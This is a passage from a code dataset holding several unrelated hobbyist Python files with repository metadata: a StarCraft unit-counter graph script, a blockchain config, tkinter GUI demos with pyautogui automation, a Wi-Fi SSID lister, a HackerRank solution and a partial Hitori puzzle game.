'Zealot')\r\n weakAgainst ('Colossus', 'Viking')\r\n weakAgainst ('Colossus', 'Corruptor')\r\n weakAgainst ('Colossus', 'Immortal')\r\n\r\n strongAgainst('Phoenix', 'Banshee')\r\n strongAgainst('Phoenix', 'Mutalisk')\r\n strongAgainst('Phoenix', 'Void Ray')\r\n weakAgainst ('Phoenix', 'Battlecruiser')\r\n weakAgainst ('Phoenix', 'Corruptor')\r\n weakAgainst ('Phoenix', 'Carrier')\r\n\r\n strongAgainst('Void Ray', 'Battlecruiser')\r\n strongAgainst('Void Ray', 'Corruptor')\r\n strongAgainst('Void Ray', 'Tempest')\r\n weakAgainst ('Void Ray', 'Viking')\r\n weakAgainst ('Void Ray', 'Mutalisk')\r\n weakAgainst ('Void Ray', 'Phoenix')\r\n\r\n strongAgainst('High Templar', 'Marine')\r\n strongAgainst('High Templar', 'Hydralisk')\r\n strongAgainst('High Templar', 'Sentry')\r\n weakAgainst ('High Templar', 'Ghost')\r\n weakAgainst ('High Templar', 'Roach')\r\n weakAgainst ('High Templar', 'Colossus')\r\n\r\n strongAgainst('Dark Templar', 'SCV')\r\n strongAgainst('Dark Templar', 'Drone')\r\n strongAgainst('Dark Templar', 'Probe')\r\n weakAgainst ('Dark Templar', 'Raven')\r\n weakAgainst ('Dark Templar', 'Overseer')\r\n weakAgainst ('Dark Templar', 'Observer')\r\n\r\n strongAgainst('Archon', 'Mutalisk')\r\n weakAgainst ('Archon', 'Thor')\r\n weakAgainst ('Archon', 'Ultralisk')\r\n weakAgainst ('Archon', 'Immortal')\r\n\r\n strongAgainst('Carrier', 'Thor')\r\n strongAgainst('Carrier', 'Mutalisk')\r\n strongAgainst('Carrier', 'Phoenix')\r\n weakAgainst ('Carrier', 'Viking')\r\n weakAgainst ('Carrier', 'Corruptor')\r\n weakAgainst ('Carrier', 'Void Ray')\r\n\r\n weakAgainst ('Mothership', 'Viking')\r\n weakAgainst ('Mothership', 'Corruptor')\r\n weakAgainst ('Mothership', 'Void Ray')\r\n\r\n strongAgainst('Oracle', 'SCV')\r\n strongAgainst('Oracle', 'Drone')\r\n strongAgainst('Oracle', 'Probe')\r\n weakAgainst ('Oracle', 'Viking')\r\n weakAgainst ('Oracle', 'Mutalisk')\r\n weakAgainst ('Oracle', 'Phoenix')\r\n\r\n strongAgainst('Tempest', 'Swarm Host')\r\n strongAgainst('Tempest', 'Siege Tank')\r\n strongAgainst('Tempest', 'Colossus')\r\n weakAgainst ('Tempest', 'Viking')\r\n weakAgainst ('Tempest', 'Corruptor')\r\n weakAgainst ('Tempest', 'Void Ray')\r\n\r\n strongAgainst('Adept', 'Zergling')\r\n strongAgainst('Adept', 'Zealot')\r\n strongAgainst('Adept', 'Marine')\r\n weakAgainst ('Adept', 'Roach')\r\n weakAgainst ('Adept', 'Stalker')\r\n weakAgainst ('Adept', 'Marauder')\r\n\r\n strongAgainst('Disruptor', 'Marauder')\r\n strongAgainst('Disruptor', 'Hydralisk')\r\n strongAgainst('Disruptor', 'Probe')\r\n weakAgainst ('Disruptor', 'Thor')\r\n weakAgainst ('Disruptor', 'Ultralisk')\r\n weakAgainst ('Disruptor', 'Immortal')\r\n\r\n strongAgainst('Zergling', 'Marauder')\r\n strongAgainst('Zergling', 'Hydralisk')\r\n strongAgainst('Zergling', 'Stalker')\r\n weakAgainst ('Zergling', 'Hellion')\r\n weakAgainst ('Zergling', 'Baneling')\r\n weakAgainst ('Zergling', 'Colossus')\r\n\r\n strongAgainst('Queen', 'Hellion')\r\n strongAgainst('Queen', 'Mutalisk')\r\n strongAgainst('Queen', 'Void Ray')\r\n weakAgainst ('Queen', 'Marine')\r\n weakAgainst ('Queen', 'Zergling')\r\n weakAgainst ('Queen', 'Zealot')\r\n\r\n strongAgainst('Hydralisk', 'Banshee')\r\n strongAgainst('Hydralisk', 'Mutalisk')\r\n strongAgainst('Hydralisk', 'Void Ray')\r\n weakAgainst ('Hydralisk', 'Siege Tank')\r\n weakAgainst ('Hydralisk', 'Zergling')\r\n weakAgainst ('Hydralisk', 'Colossus')\r\n\r\n strongAgainst('Baneling', 'Marine')\r\n strongAgainst('Baneling', 'Zergling')\r\n strongAgainst('Baneling', 'Zealot')\r\n weakAgainst ('Baneling', 'Marauder')\r\n weakAgainst ('Baneling', 'Roach')\r\n weakAgainst ('Baneling', 'Stalker')\r\n\r\n strongAgainst('Overseer', 'Banshee')\r\n strongAgainst('Overseer', 'Roach')\r\n strongAgainst('Overseer', 'Dark Templar')\r\n weakAgainst ('Overseer', 'Viking')\r\n weakAgainst ('Overseer', 'Mutalisk')\r\n weakAgainst ('Overseer', 'Stalker')\r\n\r\n strongAgainst('Roach', 'Hellion')\r\n strongAgainst('Roach', 'Zergling')\r\n strongAgainst('Roach', 'Zealot')\r\n weakAgainst ('Roach', 'Marauder')\r\n weakAgainst ('Roach', 'Ultralisk')\r\n weakAgainst ('Roach', 'Immortal')\r\n\r\n strongAgainst('Infestor', 'Marine')\r\n strongAgainst('Infestor', 'Mutalisk')\r\n strongAgainst('Infestor', 'Immortal')\r\n weakAgainst ('Infestor', 'Ghost')\r\n weakAgainst ('Infestor', 'Ultralisk')\r\n weakAgainst ('Infestor', 'High Templar')\r\n\r\n strongAgainst('Mutalisk', 'Viking')\r\n strongAgainst('Mutalisk', 'Brood Lord')\r\n strongAgainst('Mutalisk', 'Void Ray')\r\n weakAgainst ('Mutalisk', 'Thor')\r\n weakAgainst ('Mutalisk', 'Corruptor')\r\n weakAgainst ('Mutalisk', 'Phoenix')\r\n\r\n strongAgainst('Corruptor', 'Battlecruiser')\r\n strongAgainst('Corruptor', 'Mutalisk')\r\n strongAgainst('Corruptor', 'Phoenix')\r\n weakAgainst ('Corruptor', 'Viking')\r\n weakAgainst ('Corruptor', 'Hydralisk')\r\n weakAgainst ('Corruptor', 'Void Ray')\r\n\r\n strongAgainst('Ultralisk', 'Marauder')\r\n strongAgainst('Ultralisk', 'Roach')\r\n strongAgainst('Ultralisk', 'Stalker')\r\n weakAgainst ('Ultralisk', 'Banshee')\r\n weakAgainst ('Ultralisk', 'Mutalisk')\r\n weakAgainst ('Ultralisk', 'Void Ray')\r\n\r\n strongAgainst('Brood Lord', 'Marine')\r\n strongAgainst('Brood Lord', 'Hydralisk')\r\n strongAgainst('Brood Lord', 'Stalker')\r\n weakAgainst ('Brood Lord', 'Viking')\r\n weakAgainst ('Brood Lord', 'Corruptor')\r\n weakAgainst ('Brood Lord', 'Void Ray')\r\n\r\n strongAgainst('Swarm Host', 'Marine')\r\n strongAgainst('Swarm Host', 'Stalker')\r\n strongAgainst('Swarm Host', 'Roach')\r\n weakAgainst ('Swarm Host', 'Baneling')\r\n weakAgainst ('Swarm Host', 'Hellion')\r\n weakAgainst ('Swarm Host', 'Archon')\r\n\r\n strongAgainst('Viper', 'Siege Tank')\r\n strongAgainst('Viper', 'Colossus')\r\n strongAgainst('Viper', 'Hydralisk')\r\n weakAgainst ('Viper', 'Viking')\r\n weakAgainst ('Viper', 'Mutalisk')\r\n weakAgainst ('Viper', 'Phoenix')\r\n\r\n strongAgainst('Ravager', 'Siege Tank')\r\n strongAgainst('Ravager', 'Lurker')\r\n strongAgainst('Ravager', 'Sentry')\r\n weakAgainst ('Ravager', 'Marauder')\r\n weakAgainst ('Ravager', 'Ultralisk')\r\n weakAgainst ('Ravager', 'Immortal')\r\n\r\n strongAgainst('Lurker', 'Marine')\r\n strongAgainst('Lurker', 'Hydralisk')\r\n strongAgainst('Lurker', 'Zealot')\r\n weakAgainst ('Lurker', 'Siege Tank')\r\n weakAgainst ('Lurker', 'Ultralisk')\r\n weakAgainst ('Lurker', 'Disruptor')\r\n\r\n\r\ndef writeGraph():\r\n with open('strongerGraph.tgf', 'w') as f:\r\n for name, i in units.items():\r\n print('{} {}'.format(i, name), file=f)\r\n\r\n print('#', file=f)\r\n\r\n for edge_from, edge_to in stronger:\r\n print('{} {}'.format(edge_from, edge_to), file=f)\r\n\r\n\r\nif __name__ == '__main__':\r\n names = []\r\n names += open('terran_units.txt', 'r').read().split('\\n')\r\n names += open('protoss_units.txt', 'r').read().split('\\n')\r\n names += open('zerg_units.txt', 'r').read().split('\\n')\r\n units = {}\r\n \r\n for i, name in enumerate(names):\r\n units[name] = i+1\r\n \r\n stronger = set()\r\n makeStrongerRelation()\r\n # writeGraph()\r\n edges = np.array(list(stronger))\r\n\r\n strgVsCnt = []\r\n weakVsCnt = []\r\n diffVsCnt = []\r\n for i, name in enumerate(names):\r\n strgVsCnt += [(np.sum(edges[:, 0] == i + 1), name)]\r\n weakVsCnt += [(np.sum(edges[:, 1] == i + 1), name)]\r\n diffVsCnt += [(strgVsCnt[-1][0] - weakVsCnt[-1][0], name)]\r\n\r\n print(sorted(strgVsCnt, reverse=True))\r\n print()\r\n print(sorted(weakVsCnt, reverse=True))\r\n print()\r\n print(sorted(diffVsCnt, reverse=True))\r\n","repo_name":"pisarik/Learning","sub_path":"haskell/starcraft/build_tgf_strongest_graph.py","file_name":"build_tgf_strongest_graph.py","file_ext":"py","file_size_in_byte":12448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"23185796681","text":"#!/usr/bin/python\nimport os\n\nMONGODB_HOST = os.getenv('MONGODB_HOST', 'localhost')\nMONGODB_PORT = os.getenv('MONGODB_PORT', 27017)\nMONGODB_DBNAME = os.getenv('MONGODB_DBNAME', 'blockchain')\n#REDIS_PASSWORD = os.getenv('REDIS_PASSWORD', None)\nMONGODB_COLLECTIONS = {\n 'pending_transactions': 'transactions',\n 'list_nodes': 'nodes',\n 'mining': 'mining'\n}\n\nELASTIC_HOST = os.getenv('ELASTIC_HOST', 'http://localhost:9200')\nELASTIC_INDEX = \"blockchain\"\n\nAPI_NODE = os.getenv(\"API_NODE\", \"http://10.5.9.110:5000\")\nENV = os.getenv('ENV', 'develop')\n\nBLOCK_VAR_CONVERSIONS = {\n 'txid': str,\n 'index': int,\n 'nonce': int,\n 'hash': str,\n 'prev_hash': str,\n 'timestamp': str,\n 'data': str\n}\nCHAINDATA_DIR = \"./chaindata/\"\n\nNUM_ZEROS = int(os.getenv('NUM_ZEROS', 4))\nSTANDARD_ROUNDS = 100000","repo_name":"greatbn/kma-blockchain","sub_path":"core/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"19341367042","text":"from tkinter import ttk\r\nfrom tkinter import *\r\nfrom create import inserir_filmes, inserir_usuarios\r\nfrom read import listar_usuarios, procurar_usuario\r\nfrom update import up_usuario\r\nfrom delete import dt_usuario\r\nimport pyautogui\r\npyautogui.PAUSE = 1\r\n\r\njanela = Tk()\r\n\r\n\r\nclass Aplicacao():\r\n def __init__(self):\r\n self.janela = janela\r\n self.tela()\r\n self.frames()\r\n self.botoes()\r\n self.labels()\r\n self.inserts()\r\n self.lista()\r\n self.select_list()\r\n\r\n janela.mainloop()\r\n\r\n def tela(self):\r\n self.janela.title(\"NETFLIX\")\r\n self.janela.configure(background=\"cyan\")\r\n self.janela.geometry(\"700x800\")\r\n self.janela.resizable(True, True)\r\n self.janela.minsize(width=700, height=800)\r\n\r\n def frames(self):\r\n self.frame0 = Frame(self.janela, bg=\"black\")\r\n self.frame0.place(relheight=0.07, relwidth=0.94, relx=0.03, rely=0.03)\r\n self.frame1 = Frame(self.janela, bg=\"black\")\r\n self.frame1.place(relheight=0.20, relwidth=0.94, relx=0.03, rely=0.12)\r\n self.frame2 = Frame(self.janela, bg=\"black\")\r\n self.frame2.place(relheight=0.20, relwidth=0.94, relx=0.03, rely=0.34)\r\n\r\n def botoes(self):\r\n self.btBuscar = Button(self.frame0, text='Buscar', bg=\"cyan\", command=self.select_user)\r\n self.btBuscar.place(relx=0.15, rely=0.40, relwidth=0.1, relheight=0.50)\r\n\r\n self.btLimpar = Button(self.frame0, text='Limpar', bg=\"cyan\", command=self.limpar_tela)\r\n self.btLimpar.place(relx=0.27, rely=0.40, relwidth=0.1, relheight=0.50)\r\n\r\n self.btCreate = Button(self.frame0, text='Create', bg=\"cyan\", command=self.insert_user)\r\n self.btCreate.place(relx=0.45, rely=0.40, relwidth=0.1, relheight=0.50)\r\n\r\n self.btRead = Button(self.frame0, text='Read', bg=\"cyan\", command=self.select_list)\r\n self.btRead.place(relx=0.57, rely=0.40, relwidth=0.1, relheight=0.50)\r\n\r\n self.btUpdate = Button(self.frame0, text='Update', bg=\"cyan\", command=self.update_user)\r\n self.btUpdate.place(relx=0.69, rely=0.40, relwidth=0.1, relheight=0.50)\r\n\r\n self.btDelete = Button(self.frame0, text='Delete', bg=\"cyan\", command=self.delete_user)\r\n self.btDelete.place(relx=0.81, rely=0.40, relwidth=0.1, relheight=0.50)\r\n\r\n self.btDimensao = Button(self.janela, text='Tela', bg=\"cyan\", command=self.dimension)\r\n self.btDimensao.place(relx=0.05, rely=0.50, relwidth=0.1, relheight=0.10)\r\n\r\n self.btPosicao = Button(self.janela, text='Posicao', bg=\"cyan\", command=self.position)\r\n self.btPosicao.place(relx=0.20, rely=0.50, relwidth=0.1, relheight=0.10)\r\n\r\n self.btMover = Button(self.janela, text='Mover', bg=\"cyan\", command=self.move)\r\n self.btMover.place(relx=0.35, rely=0.50, relwidth=0.1, relheight=0.10)\r\n\r\n self.btAlerta = Button(self.janela, text='Alerta', bg=\"cyan\", command=self.alert)\r\n self.btAlerta.place(relx=0.50, rely=0.50, relwidth=0.1, relheight=0.10)\r\n\r\n self.btBot = Button(self.janela, text='bot', bg=\"cyan\", command=self.bot)\r\n self.btBot.place(relx=0.65, rely=0.50, relwidth=0.1, relheight=0.10)\r\n\r\n def labels(self):\r\n self.lbIDUsuario = Label(self.frame0, text=\"ID\", background=\"cyan\")\r\n self.lbIDUsuario.place(relx=0.005, rely=0.01, relwidth=0.1, relheight=0.3)\r\n\r\n self.lbNome = Label(self.frame1, text=\"Nome\", bg=\"cyan\")\r\n self.lbNome.place(relx=0.005, rely=0.06, relwidth=0.1, relheight=0.15)\r\n\r\n self.lbEmail = Label(self.frame1, text=\"Email\", bg=\"cyan\")\r\n self.lbEmail.place(relx=0.005, rely=0.37, relwidth=0.1, relheight=0.15)\r\n\r\n self.lbPlano = Label(self.frame1, text=\"Plano\", bg=\"cyan\")\r\n self.lbPlano.place(relx=0.005, rely=0.69, relwidth=0.1, relheight=0.15)\r\n\r\n self.lbTipo = Label(self.frame1, text=\"Tipo\", bg=\"cyan\")\r\n self.lbTipo.place(relx=0.32, rely=0.69, relwidth=0.1, relheight=0.15)\r\n\r\n self.lbIdade = Label(self.frame1, text=\"Idade\", bg=\"cyan\")\r\n self.lbIdade.place(relx=0.62, rely=0.69, relwidth=0.1, relheight=0.15)\r\n\r\n def inserts(self):\r\n self.insertIDUsuario = Entry(self.frame0, background=\"cyan\")\r\n self.insertIDUsuario.place(relx=0.005, rely=0.40, relwidth=0.1, relheight=0.47)\r\n\r\n self.insertNome = Entry(self.frame1, bg=\"cyan\")\r\n self.insertNome.place(relx=0.155, rely=0.05, relwidth=0.75, relheight=0.23)\r\n\r\n self.insertEmail = Entry(self.frame1, bg=\"cyan\")\r\n self.insertEmail.place(relx=0.155, rely=0.37, relwidth=0.75, relheight=0.23)\r\n\r\n self.insertPlano = Entry(self.frame1, bg=\"cyan\")\r\n self.insertPlano.place(relx=0.155, rely=0.69, relwidth=0.15, relheight=0.23)\r\n\r\n self.insertTipo = Entry(self.frame1, bg=\"cyan\")\r\n self.insertTipo.place(relx=0.45, rely=0.69, relwidth=0.15, relheight=0.23)\r\n\r\n self.insertIdade = Entry(self.frame1, bg=\"cyan\")\r\n self.insertIdade.place(relx=0.75, rely=0.69, relwidth=0.15, relheight=0.23)\r\n\r\n def lista(self):\r\n self.listaCli = ttk.Treeview(self.frame2, height=3, columns=(\"col1\", \"col2\", \"col3\", \"col4\", \"col5\", \"col6\", \"col7\"))\r\n\r\n self.listaCli.heading('#0', text='')\r\n self.listaCli.heading('#1', text='ID')\r\n self.listaCli.heading('#2', text='Nome')\r\n self.listaCli.heading('#3', text='Email')\r\n self.listaCli.heading('#4', text='Plano')\r\n self.listaCli.heading('#5', text='Tipo')\r\n self.listaCli.heading('#6', text='Class')\r\n\r\n self.listaCli.column('#0', width=5)\r\n self.listaCli.column('#1', width=35)\r\n self.listaCli.column('#2', width=188)\r\n self.listaCli.column('#3', width=188)\r\n self.listaCli.column('#4', width=70)\r\n self.listaCli.column('#5', width=70)\r\n self.listaCli.column('#6', width=70)\r\n\r\n self.listaCli.place(relx=0.025, rely=0.075, relwidth=0.925, relheight=0.85)\r\n\r\n self.scrollLista = Scrollbar(self.frame2, orient='vertical')\r\n self.listaCli.configure(yscrollcommand=self.scrollLista.set)\r\n self.scrollLista.place(relx=0.949, rely=0.079, relwidth=0.02, relheight=0.84)\r\n\r\n def insert_user(self):\r\n if self.insertNome.get()!='':\r\n inserir_usuarios(self.insertNome.get(), self.insertEmail.get(), self.insertPlano.get(),\r\n self.insertTipo.get(), self.insertIdade.get())\r\n self.select_list()\r\n self.limpar_tela()\r\n\r\n def select_list(self):\r\n self.listaCli.delete(*self.listaCli.get_children())\r\n for i in listar_usuarios():\r\n self.listaCli.insert(parent='', index=0, values=i)\r\n\r\n def select_user(self):\r\n self.listaCli.delete(*self.listaCli.get_children())\r\n usuario = procurar_usuario(self.insertIDUsuario.get())\r\n self.listaCli.insert(parent='', index=0, values=usuario[0])\r\n self.insertNome.insert(0, usuario[0][1])\r\n self.insertEmail.insert(0, usuario[0][2])\r\n self.insertPlano.insert(0, usuario[0][3])\r\n self.insertTipo.insert(0, usuario[0][4])\r\n self.insertIdade.insert(0, usuario[0][5])\r\n\r\n def limpar_tela(self):\r\n self.insertIDUsuario.delete(0, end)\r\n self.insertNome.delete(0, end)\r\n self.insertPlano.delete(0, end)\r\n self.insertEmail.delete(0, end)\r\n self.insertTipo.delete(0, end)\r\n self.insertIdade.delete(0, end)\r\n self.select_list()\r\n\r\n def delete_user(self):\r\n dt_usuario(self.insertIDUsuario.get())\r\n self.select_list()\r\n self.limpar_tela()\r\n\r\n def update_user(self):\r\n if self.insertNome.get():\r\n self.insertIDUsuario.update()\r\n self.insertNome.update()\r\n self.insertPlano.update()\r\n self.insertEmail.update()\r\n self.insertTipo.update()\r\n self.insertIdade.update()\r\n up_usuario(self.insertIDUsuario.get(),\r\n self.insertNome.get(),\r\n self.insertEmail.get(),\r\n self.insertPlano.get(),\r\n self.insertTipo.get(),\r\n self.insertIdade.get())\r\n self.limpar_tela()\r\n self.select_list()\r\n\r\n def dimension(self):\r\n x, y = pyautogui.size()\r\n print(x)\r\n print(y)\r\n\r\n def position(self):\r\n w, z = pyautogui.position()\r\n print(w)\r\n print(z)\r\n\r\n def move(self):\r\n pyautogui.moveTo(50,50)\r\n\r\n\r\n def alert(self):\r\n print(pyautogui.confirm(text='Prometo fazer os exercicios', title='Feriado', buttons=['ok', 'Cancel']))\r\n\r\n def bot(self):\r\n pyautogui.press('win')\r\n pyautogui.write('bloco')\r\n pyautogui.press('enter')\r\n pyautogui.write('Aula de PyautoGui' )\r\n pyautogui.hotkey('crtl', 's')\r\n pyautogui.write('Rascunho')\r\n pyautogui.hotkey('alt', 'l')\r\n pyautogui.hotkey('win', 'd')\r\n","repo_name":"Kadu17/Exercicios.py","sub_path":"janela.py","file_name":"janela.py","file_ext":"py","file_size_in_byte":8947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"6004672442","text":"from tkinter import *\n\nimport tkinter\n\n\nbt = Button(text='spam')\nbt.pack(padx=20, pady=20)\n\nbt.config(bd=8, relief=RAISED)\nbt.config(bg='dark green', fg='gray')\n\nbt.config(font=('helvetica', 20, 'underline italic'))\n\n\n\n\nmainloop()\n","repo_name":"jonasht/programmingPython-book","sub_path":"08-ATkinterTour_part1/01-configuringWidgetAppearance/configButton.py","file_name":"configButton.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"22821137426","text":"import re\nimport subprocess\n\ndef getsidds():\n results = subprocess.check_output([\"netsh\",\"wlan\",\"show\",\"Network\", \"mode=Bssid\"])\n results = str(results).replace(\"\\\\r\",\"\")\n results = results.split(\"\\\\n\")\n results = results[4:]\n\n sidds = []\n intencities = []\n for x in results:\n print(x)\n if \":\" in x and not \" \" in x:\n name = re.search(\"[^:]*\", x)\n if len(x.replace(name[0],\"\")[2:]):\n sidds.append(x.replace(name[0],\"\")[2:])\n elif \"Signal\" in x:\n name = re.search(\"[^:]*\", x)\n if len(x.replace(name[0],\"\")[2:]):\n intencities.append(x.replace(name[0],\"\")[2:])\n nets = []\n for n in range(0,len(sidds)):\n data = {\n \"name\": sidds[n],\n \"intencity\": intencities[n]\n }\n nets.append(data)\n return(nets)","repo_name":"Hallip/Rovyle","sub_path":"Configuration Wizard/wifiConfiguration.py","file_name":"wifiConfiguration.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"71027994642","text":"#Input : AABCAAADA\n#\t\t 3\n\n#Output : AB\n#\t\t CA\n#\t\t AD\n\nstring = \"AABCAAADA\" #input(\"String :\")\nk = 3 #int(input(\"K :\"))\n\nl = len(string)//k\n#st = 0\n#for i in range(l) :\n\n#MY METHOD-------------------------------\n\n#for i in range(0, len(s), l) :\n#\tsub = []\n#\tfor j in range(l) :\n#\t\tif s[j+i] not in sub :\n#\t\t\tsub.append(s[j+i])\n\t\t\n#\tprint(\"\".join(sub))\t\t\n\n#-----------------------------------------\t\n\n#OPTIMIZED METHOD-------------------------\n\ntemp = []\ntemp_len = 0\nfor S in string :\n\ttemp_len += 1\n\tif S not in temp :\n\t\ttemp.append(S)\n\tif temp_len == l :\n\t\tprint(\"\".join(temp))\n\t\ttemp = []\n\t\ttemp_len = 0 \t\n\n\t\n","repo_name":"AkashVD/Hackerrank_py","sub_path":"Merge_the_tools.py","file_name":"Merge_the_tools.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39526688484","text":"from boardgame import BoardGame\r\nfrom boardgamegui import BoardGameGui, gui_play\r\nfrom random import randrange\r\nimport g2d\r\n\r\nCIRCLE = -1\r\nBLACK = -3\r\n\r\nclass Hitori(BoardGame):\r\n\r\n\tdef __init__(self, side=8):\r\n\t\t#di partenza la matrice è 8x8\r\n\t\tself._cols, self._rows = side,side\r\n\t\tself._matriceOriginale = [[' ' for x in range(self._cols)] for y in range(self._rows)] #matrice per assegnare i valori numerici originari delle celle\r\n\t\tself._valoriGui = [] #matrice che verrà successivamente inizializzata\r\n\t\tself._valori = [[0 for x in range(self._cols)] for y in range(self._rows)] #matrice per assegnare soli valori black e circle\r\n\t\tself._automatismi = 0 #variabile per impostare l'automatismo\r\n\t\tself._regioniChiuse = 0 #variabile per segnare il numero di regioni chiuse\r\n\r\n\t#metodo per inizializzare la matrice e decidere la sua grandezza\r\n\tdef initMatriceGui(self, side: int):\r\n\t\tnum = randrange(0, 4)\r\n\t\tval = 0\r\n\t\tcontRows = 0\r\n\t\twith open(\"esempi\"+str(side)+\".txt\", \"r\") as file:\r\n\t\t\tfor linea in file:\r\n\t\t\t\tif val >= num * 10 and contRows < int(side):\r\n\t\t\t\t\trigaNum = linea.strip().split(\",\")\r\n\t\t\t\t\tself._valoriGui.append(rigaNum)\r\n\t\t\t\t\tcontRows += 1\r\n\t\t\t\tval += 1\r\n\r\n\tdef getRegioniChiuse(self) -> int:\r\n\t\treturn self._regioniChiuse\r\n\r\n\tdef setRegioniChiuse(self, numRegioniChiuse: int):\r\n\t\tself._regioniChiuse = numRegioniChiuse\r\n\r\n\tdef getValAutomatismi(self) -> int:\r\n\t\treturn self._automatismi\r\n\r\n\tdef setValAutomatismi(self, valAutomatismo: int):\r\n\t\tself._automatismi = valAutomatismo\r\n\r\n\t#metodo per tornare un valore numerico originale\r\n\tdef getElement(self, x: int, y: int) -> int:\r\n\t\treturn self._valoriGui[y][x]\r\n\r\n\tdef getMatriceOriginale(self):\r\n\t\treturn self._matriceOriginale\r\n\r\n\tdef setMatriceOriginale(self, matrice):\r\n\t\tself._matriceOriginale = matrice\r\n\r\n\tdef getMatriceGui(self):\r\n\t\treturn self._valoriGui\r\n\r\n\tdef setMatriceGui(self, matrice):\r\n\t\tself._valoriGui = matrice\r\n\r\n\tdef getMatrice(self):\r\n\t\treturn self._valori\r\n\r\n\tdef setMatrice(self, matrice):\r\n\t\tself._valori = matrice\r\n\r\n\tdef cols(self) -> int:\r\n\t\treturn self._cols\r\n\r\n\tdef rows(self) -> int:\r\n\t\treturn self._rows\r\n\r\n\tdef setCols(self, valCols: int):\r\n\t\tself._cols = valCols\r\n\r\n\tdef setRows(self, valRows: int):\r\n\t\tself._rows = valRows\r\n\r\n\t#metodo per controllare se ci sono delle regioni di celle bianche non contigue : NON funzionante\r\n\tdef controlloRegioniBianche(self):\r\n\t\tmatriceVal = self.getMatriceGui()\r\n\t\tmatrice2 = self.getMatrice()\r\n\t\tcont = 0\r\n\t\tcont2 = 0\r\n\t\tsupp = 0\r\n\t\tsupp2 = 0\r\n\t\tesito = 0\r\n\t\tesito2 = 0\r\n\r\n\t\t# codice per il controllo di regioni di celle bianche non funzionanti\r\n\t\tfor x in range(self.rows()):\r\n\t\t\tfor y in range(self.cols()):\r\n\t\t\t\tif matrice2[x][y] == BLACK and esito == 0:\r\n\t\t\t\t\tif cont == 0 :\r\n\t\t\t\t\t\tsupp = x\r\n\t\t\t\t\tif x < self.cols()-1 and y < self.cols()-1 :\r\n\t\t\t\t\t\tif matrice2[x+1][y+1] == BLACK :\r\n\t\t\t\t\t\t\tcont += 1\r\n\t\t\t\t\t\t\tif cont == 7 - supp:\r\n\t\t\t\t\t\t\t\tself.setRegioniChiuse(self.getRegioniChiuse()+1)\r\n\t\t\t\t\t\t\t\tesito = 1\r\n\r\n\t\tfor x in range(self.rows()):\r\n\t\t\tfor y in range(self.cols()):\r\n\t\t\t\tif matrice2[x][y] == BLACK and esito2 == 0:\r\n\t\t\t\t\tif cont2 == 0 :\r\n\t\t\t\t\t\tsupp2 = y\r\n\t\t\t\t\tif x > 0 and y > 0 :\r\n\t\t\t\t\t\tif matrice2[x - 1][y - 1] == BLACK:\r\n\t\t\t\t\t\t\tcont2 += 1\r\n\t\t\t\t\t\t\tif cont2 == 7 - supp2:\r\n\t\t\t\t\t\t\t\tself.setRegioniChiuse(self.getRegioniChiuse()+1)\r\n\t\t\t\t\t\t\t\tesito2 = 1\r\n\r\n\tdef finished(self) -> bool:\r\n\t\tif self.controlloCelleNereColonne() != 0 :\r\n\t\t\tg2d.alert(self.message(\"ci sono due celle nere vicine in una colonna\"))\r\n\t\tif self.controlloCelleNereRighe() != 0:\r\n\t\t\tg2d.alert(self.message(\"ci sono due celle nere vicine in una riga\"))\r\n\t\tif self.cellaBiancaChiusa() != 0 :\r\n\t\t\tg2d.alert(self.message(\"una o più celle bianche sono chiuse dalle celle nere\"))\r\n\r\n\t\tif(self.controlloRigheNumeri()/2 == 0 and self.controlloColonneNumeri()/2 == 0 and self.controlloCelleNereRighe() == 0\r\n\t\t\t\tand self.controlloCelleNereColonne() == 0 and self.cellaBiancaChiusa() == 0) :\r\n\t\t\treturn True\r\n\r\n\t#metodo che controlla che non ci siano numeri ripetuti in una riga\r\n\tdef controlloRigheNumeri(self) -> int:\r\n\t\tmatriceVal = self.getMatriceGui()\r\n\t\tmatrice2 = self.getMatrice()\r\n\t\tfinitoRighe = 0\r\n\t\t# variabili usate per controllare che nel ciclo non venga guardata la cella che si sta già controllando\r\n\t\tcont1R = 0\r\n\t\tcont2R = 0\r\n\r\n\t\tfor y in range(self.rows()):\r\n\t\t\tfor x in range(self.cols()):\r\n\t\t\t\tfor val in range(self.cols()):\r\n\t\t\t\t\tif cont2R != cont1R and matriceVal[y][x] == matriceVal[y][val] and matrice2[y][x] != BLACK and matrice2[y][val] != BLACK:\r\n\t\t\t\t\t\tfinitoRighe += 1\r\n\t\t\t\t\tcont1R += 1;\r\n\t\t\t\tcont2R += 1;\r\n\t\t\t\tcont1R = 0\r\n\t\t\tcont2R = 0\r\n\r\n\t\treturn finitoRighe\r\n\r\n\t# metodo che controlla che non ci siano numeri ripetuti in una colonna\r\n\tdef controlloColonneNumeri(self) -> int:\r\n\t\tmatriceVal = self.getMatriceGui()\r\n\t\tmatrice2 = self.getMatrice()\r\n\t\tfinitoColonne = 0\r\n\t\t#variabili usate per controllare che nel ciclo non venga guardata la cella che si sta già controllando\r\n\t\tcont1C = 0\r\n\t\tcont2C = 0\r\n\r\n\t\tfor y in range(self.rows()):\r\n\t\t\tfor x in range(self.cols()):\r\n\t\t\t\tfor val in range(self.cols()):\r\n\t\t\t\t\tif cont2C != cont1C and matriceVal[x][y] == matriceVal[val][y] and matrice2[x][y] != BLACK and matrice2[val][y] != BLACK:\r\n\t\t\t\t\t\tfinitoColonne += 1\r\n\t\t\t\t\tcont1C += 1;\r\n\t\t\t\tcont2C += 1;\r\n\t\t\t\tcont1C = 0\r\n\t\t\tcont2C = 0\r\n\t\treturn finitoColonne\r\n\r\n\t# metodo che controlla che non ci siano celle annerite vicine in una riga\r\n\tdef controlloCelleNereRighe(self) -> int:\r\n\t\tmatrice2 = self.getMatrice()\r\n\t\tfinitoNeriR = 0\r\n\r\n\t\tfor y in range(self.rows()):\r\n\t\t\tfor x in range(self.cols()):\r\n\t\t\t\tif x < 